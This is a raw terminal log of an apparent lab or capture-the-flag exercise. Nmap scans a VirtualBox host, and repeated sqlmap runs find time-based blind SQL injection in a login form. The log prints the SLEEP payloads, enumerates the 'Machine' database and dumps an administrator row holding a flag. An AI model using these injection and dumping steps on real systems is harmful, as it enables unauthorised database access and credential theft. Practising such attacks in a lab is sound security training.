Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 04:31 CST
Nmap scan report for 192.168.0.1
Host is up (0.00048s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.0.101
Host is up (0.18s latency).
MAC Address: DA:3F:DF:36:C2:F8 (Unknown)
Nmap scan report for 192.168.0.102
Host is up (0.19s latency).
MAC Address: D2:66:41:4A:73:EF (Unknown)
Nmap scan report for 192.168.0.103
Host is up (0.19s latency).
MAC Address: 7A:7D:03:A2:2C:73 (Unknown)
Nmap scan report for 192.168.0.105
Host is up (0.19s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for 192.168.0.106
Host is up (0.18s latency).
MAC Address: 2A:86:BB:96:BD:6C (Unknown)
Nmap scan report for 192.168.0.107
Host is up (0.00013s latency).
MAC Address: 08:00:27:ED:BD:C7 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.109
Host is up (0.00066s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for 192.168.0.104
Host is up.
Nmap done: 256 IP addresses (9 hosts up) scanned in 2.93 seconds
$ sudo nmap -sV -sC -A 192.168.0.107
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 04:32 CST
Nmap scan report for 192.168.0.107
Host is up (0.00024s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Debian))|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.46 (Debian)
MAC Address: 08:00:27:ED:BD:C7 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.24 ms 192.168.0.107
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.94 seconds
___
__H__
___ ___[(]_____ ___ ___ {1.6.3#stable}|_ -|.[)]|.'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:57:49 /2022-03-20/
[21:57:49][INFO] testing connection to the target URL
[21:57:49][INFO] searching for forms
[1/1] Form:
POST http://192.168.0.107/enter_network/
POST data: user=&pass=&sub=SEND
do you want to test this form? [Y/n/q]> Y
Edit POST data [default: user=&pass=&sub=SEND](Warning: blank fields detected):
do you want to fill blank fields with random values? [Y/n] Y
[21:57:55][INFO] resuming back-end DBMS 'mysql'[21:57:55][INFO] using '/home/joker/.local/share/sqlmap/output/results-03202022_0957pm.csv' as the CSV results filein multiple targets mode
you have not declared cookie(s), while server wants to set its own ('role=MjEyMzJmMjk...FmYzM%253D;user=JGFyZ29uMmk...8rdGVZNWxv'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pass (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=jLFz&pass=' AND (SELECT 3738 FROM (SELECT(SLEEP(5)))tzDH) AND 'UBOy'='UBOy&sub=SEND
Parameter: user (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=jLFz' AND (SELECT 6782 FROM (SELECT(SLEEP(5)))iLpP) AND 'hhga'='hhga&pass=&sub=SEND
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: user, type: Single quoted string (default)[1] place: POST, parameter: pass, type: Single quoted string
[q] Quit
> 0
y
[21:58:07][INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)[21:58:07][INFO] fetching current database
[21:58:07][WARNING] time-based comparison requires larger statistical model, please wait..............................(done)do you want sqlmap to try to optimize value(s)for DBMS delay responses (option '--time-sec')? [Y/n] y
[21:58:20][WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[21:58:31][INFO] adjusting time delay to 1 second due to good response times
Machine
current database: 'Machine'[21:58:54][INFO] fetching database names
[21:58:54][INFO] fetching number of databases
[21:58:54][INFO] resumed: 4
[21:58:54][INFO] resumed: information_schema
[21:58:54][INFO] resumed: Machine
[21:58:54][INFO] resumed: mysql
[21:58:54][INFO] resuming partial value: performa
[21:58:54][INFO] retrieved: nce_schema
available databases [4]:
[*] information_schema
[*] Machine
[*] mysql
[*] performance_schema
[21:59:38][INFO] you can find results of scanning in multiple targets mode inside the CSV file'/home/joker/.local/share/sqlmap/output/results-03202022_0957pm.csv'[*] ending @ 21:59:38 /2022-03-20/
___
__H__
___ ___[)]_____ ___ ___ {1.6.3#stable}|_ -|.[.]|.'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:02:31 /2022-03-20/
[22:02:31][INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9' from file'/usr/share/sqlmap/data/txt/user-agents.txt'[22:02:31][INFO] testing connection to the target URL
[22:02:31][INFO] searching for forms
[1/1] Form:
POST http://192.168.0.107/enter_network/
POST data: user=&pass=&sub=SEND
do you want to test this form? [Y/n/q]> Y
Edit POST data [default: user=&pass=&sub=SEND](Warning: blank fields detected): user=&pass=&sub=SEND
do you want to fill blank fields with random values? [Y/n] Y
[22:02:32][INFO] flushing session file[22:02:32][INFO] using '/home/joker/.local/share/sqlmap/output/results-03202022_1002pm.csv' as the CSV results filein multiple targets mode
you have not declared cookie(s), while server wants to set its own ('role=MjEyMzJmMjk...FmYzM%253D;user=JGFyZ29uMmk...NkS2x1VEVn'). Do you want to use those [Y/n] Y
[22:02:32][INFO] checking if the target is protected by some kind of WAF/IPS
[22:02:32][INFO] testing if the target URL content is stable
[22:02:32][INFO] target URL content is stable
[22:02:32][INFO] testing if POST parameter 'user' is dynamic
[22:02:32][WARNING] POST parameter 'user' does not appear to be dynamic
[22:02:33][WARNING] heuristic (basic)test shows that POST parameter 'user' might not be injectable
[22:02:33][INFO] testing for SQL injection on POST parameter 'user'[22:02:33][INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[22:02:34][INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'[22:02:35][INFO] testing 'Boolean-based blind - Parameter replace (original value)'[22:02:35][INFO] testing 'Generic inline queries'[22:02:36][INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'[22:02:36][INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'[22:02:37][INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'[22:02:48][INFO] POST parameter 'user' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for'MySQL' extending provided level (1) value? [Y/n] Y
[22:02:48][INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[22:02:48][INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:02:51][INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: user (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=KHfL' AND (SELECT 9320 FROM (SELECT(SLEEP(5)))HGJG) AND 'eYED'='eYED&pass=&sub=SEND
---
do you want to exploit this SQL injection? [Y/n] Y
[22:03:07][INFO] the back-end DBMS is MySQL
[22:03:07][WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s)for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)[22:03:12][INFO] fetching tables for database: 'Machine'[22:03:12][INFO] fetching number of tables for database 'Machine'[22:03:12][INFO] retrieved: 1
[22:03:19][INFO] retrieved:
[22:03:24][INFO] adjusting time delay to 1 second due to good response times
login
Database: Machine
[1 table]
+-------+
| login |
+-------+
[22:03:47][INFO] you can find results of scanning in multiple targets mode inside the CSV file'/home/joker/.local/share/sqlmap/output/results-03202022_1002pm.csv'[*] ending @ 22:03:47 /2022-03-20/
___
__H__
___ ___[)]_____ ___ ___ {1.6.3#stable}|_ -|.[(]|.'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:04:22 /2022-03-20/
[22:04:22][INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.33 (KHTML, like Gecko) Ubuntu/9.10 Chromium/13.0.752.0 Chrome/13.0.752.0 Safari/534.33' from file'/usr/share/sqlmap/data/txt/user-agents.txt'[22:04:22][INFO] testing connection to the target URL
[22:04:22][INFO] searching for forms
[1/1] Form:
POST http://192.168.0.107/enter_network/
POST data: user=&pass=&sub=SEND
do you want to test this form? [Y/n/q]> Y
Edit POST data [default: user=&pass=&sub=SEND](Warning: blank fields detected): user=&pass=&sub=SEND
do you want to fill blank fields with random values? [Y/n] Y
[22:04:23][INFO] flushing session file[22:04:23][INFO] using '/home/joker/.local/share/sqlmap/output/results-03202022_1004pm.csv' as the CSV results filein multiple targets mode
you have not declared cookie(s), while server wants to set its own ('role=MjEyMzJmMjk...FmYzM%253D;user=JGFyZ29uMmk...N3a25oT0xz'). Do you want to use those [Y/n] Y
[22:04:23][INFO] checking if the target is protected by some kind of WAF/IPS
[22:04:23][INFO] testing if the target URL content is stable
[22:04:23][INFO] target URL content is stable
[22:04:23][INFO] testing if POST parameter 'user' is dynamic
[22:04:23][WARNING] POST parameter 'user' does not appear to be dynamic
[22:04:24][WARNING] heuristic (basic)test shows that POST parameter 'user' might not be injectable
[22:04:24][INFO] testing for SQL injection on POST parameter 'user'[22:04:24][INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[22:04:25][INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'[22:04:26][INFO] testing 'Boolean-based blind - Parameter replace (original value)'[22:04:26][INFO] testing 'Generic inline queries'[22:04:27][INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'[22:04:27][INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'[22:04:28][INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'[22:04:39][INFO] POST parameter 'user' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for'MySQL' extending provided level (1) value? [Y/n] Y
[22:04:39][INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[22:04:39][INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:04:42][INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: user (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=UyDc' AND (SELECT 1506 FROM (SELECT(SLEEP(5)))RzSr) AND 'CyXL'='CyXL&pass=&sub=SEND
---
do you want to exploit this SQL injection? [Y/n] Y
[22:04:58][INFO] the back-end DBMS is MySQL
[22:04:58][WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s)for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)[22:05:04][INFO] fetching tables for database: 'Machine'[22:05:04][INFO] fetching number of tables for database 'Machine'[22:05:04][INFO] retrieved: 1
[22:05:10][INFO] retrieved:
[22:05:15][INFO] adjusting time delay to 1 second due to good response times
logi^C
[22:05:35][WARNING] user aborted in multiple target mode
do you want to skip to the next target in list? [Y/n/q] Y
[22:05:35][INFO] you can find results of scanning in multiple targets mode inside the CSV file'/home/joker/.local/share/sqlmap/output/results-03202022_1004pm.csv'[*] ending @ 22:05:35 /2022-03-20/
___
__H__
___ ___[)]_____ ___ ___ {1.6.3#stable}|_ -|.[)]|.'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:05:48 /2022-03-20/
[22:05:48][INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050513 Firefox/1.0.4' from file'/usr/share/sqlmap/data/txt/user-agents.txt'[22:05:48][INFO] testing connection to the target URL
[22:05:48][INFO] searching for forms
[1/1] Form:
POST http://192.168.0.107/enter_network/
POST data: user=&pass=&sub=SEND
do you want to test this form? [Y/n/q]> Y
Edit POST data [default: user=&pass=&sub=SEND](Warning: blank fields detected): user=&pass=&sub=SEND
do you want to fill blank fields with random values? [Y/n] Y
[22:05:48][INFO] flushing session file[22:05:48][INFO] using '/home/joker/.local/share/sqlmap/output/results-03202022_1005pm.csv' as the CSV results filein multiple targets mode
you have not declared cookie(s), while server wants to set its own ('role=MjEyMzJmMjk...FmYzM%253D;user=JGFyZ29uMmk...hINklKVitV'). Do you want to use those [Y/n] Y
[22:05:48][INFO] checking if the target is protected by some kind of WAF/IPS
[22:05:48][INFO] testing if the target URL content is stable
[22:05:49][INFO] target URL content is stable
[22:05:49][INFO] testing if POST parameter 'user' is dynamic
[22:05:49][WARNING] POST parameter 'user' does not appear to be dynamic
[22:05:49][WARNING] heuristic (basic)test shows that POST parameter 'user' might not be injectable
[22:05:49][INFO] testing for SQL injection on POST parameter 'user'[22:05:49][INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[22:05:50][INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'[22:05:52][INFO] testing 'Boolean-based blind - Parameter replace (original value)'[22:05:52][INFO] testing 'Generic inline queries'[22:05:52][INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'[22:05:53][INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'[22:05:53][INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'[22:06:04][INFO] POST parameter 'user' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for'MySQL' extending provided level (1) value? [Y/n] Y
[22:06:04][INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[22:06:04][INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:06:08][INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: user (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=kPuP' AND (SELECT 7577 FROM (SELECT(SLEEP(5)))rlbg) AND 'nKIr'='nKIr&pass=&sub=SEND
---
do you want to exploit this SQL injection? [Y/n] Y
[22:06:24][INFO] the back-end DBMS is MySQL
[22:06:24][WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s)for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)[22:06:29][INFO] fetching columns for table 'login'in database 'Machine'[22:06:29][INFO] retrieved:
[22:06:39][INFO] adjusting time delay to 1 second due to good response times
3
[22:06:41][INFO] retrieved: username
[22:07:13][INFO] retrieved: varchar(20)[22:08:00][INFO] retrieved: password
[22:08:36][INFO] retrieved: varchar(50)[22:09:23][INFO] retrieved: role
[22:09:43][INFO] retrieved: varchar(20)
Database: Machine
Table: login
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(50)|| role | varchar(20)|| username | varchar(20)|
+----------+-------------+
[22:10:30][INFO] you can find results of scanning in multiple targets mode inside the CSV file'/home/joker/.local/share/sqlmap/output/results-03202022_1005pm.csv'[*] ending @ 22:10:30 /2022-03-20/
___
__H__
___ ___["]_____ ___ ___ {1.6.3#stable}|_ -|.['] | .'|.||___|_ [,]_|_|_|__,| _||_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:11:12 /2022-03-20/
[22:11:12] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.8.0.6) Gecko/20060728 SUSE/1.5.0.6-1.3 Firefox/1.5.0.6' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[22:11:12] [INFO] testing connection to the target URL
[22:11:12] [INFO] searching for forms
[1/1] Form:
POST http://192.168.0.107/enter_network/
POST data: user=&pass=&sub=SEND
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: user=&pass=&sub=SEND] (Warning: blank fields detected): user=&pass=&sub=SEND
do you want to fill blank fields with random values? [Y/n] Y
[22:11:13] [INFO] flushing session file
[22:11:13] [INFO] using '/home/joker/.local/share/sqlmap/output/results-03202022_1011pm.csv' as the CSV results file in multiple targets mode
you have not declared cookie(s), while server wants to set its own ('role=MjEyMzJmMjk...FmYzM%253D;user=JGFyZ29uMmk...Z6Wi9pbDU4'). Do you want to use those [Y/n] Y
[22:11:13] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:11:13] [INFO] testing if the target URL content is stable
[22:11:13] [INFO] target URL content is stable
[22:11:13] [INFO] testing if POST parameter 'user' is dynamic
[22:11:13] [WARNING] POST parameter 'user' does not appear to be dynamic
[22:11:14] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
[22:11:14] [INFO] testing for SQL injection on POST parameter 'user'
[22:11:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:11:15] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[22:11:16] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[22:11:16] [INFO] testing 'Generic inline queries'
[22:11:17] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:11:17] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:11:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:11:29] [INFO] POST parameter 'user' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n] Y
[22:11:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:11:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:11:32] [INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: user (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=ycLE' AND (SELECT 6755 FROM (SELECT(SLEEP(5)))aeWE) AND 'tLVd'='tLVd&pass=&sub=SEND
---
do you want to exploit this SQL injection? [Y/n] Y
[22:11:48] [INFO] the back-end DBMS is MySQL
[22:11:48] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[22:11:53] [INFO] fetching entries of column(s) 'password,role,username' for table 'login' in database 'Machine'
[22:11:53] [INFO] fetching number of column(s) 'password,role,username' entries for table 'login' in database 'Machine'
[22:11:53] [INFO] retrieved: 1
[22:12:00] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[22:12:09] [INFO] adjusting time delay to 1 second due to good response times
FLAG{N7:KSA_01}
[22:13:20] [INFO] retrieved: admin
[22:13:41] [INFO] retrieved: administrator
Database: Machine
Table: login
[1 entry]
+-----------------+-------+---------------+
| password | role | username |
+-----------------+-------+---------------+
| FLAG{N7:KSA_01} | admin | administrator |
+-----------------+-------+---------------+
[22:14:34] [INFO] table 'Machine.login' dumped to CSV file '/home/joker/.local/share/sqlmap/output/192.168.0.107/dump/Machine/login.csv'
[22:14:34] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/joker/.local/share/sqlmap/output/results-03202022_1011pm.csv'
[*] ending @ 22:14:34 /2022-03-20/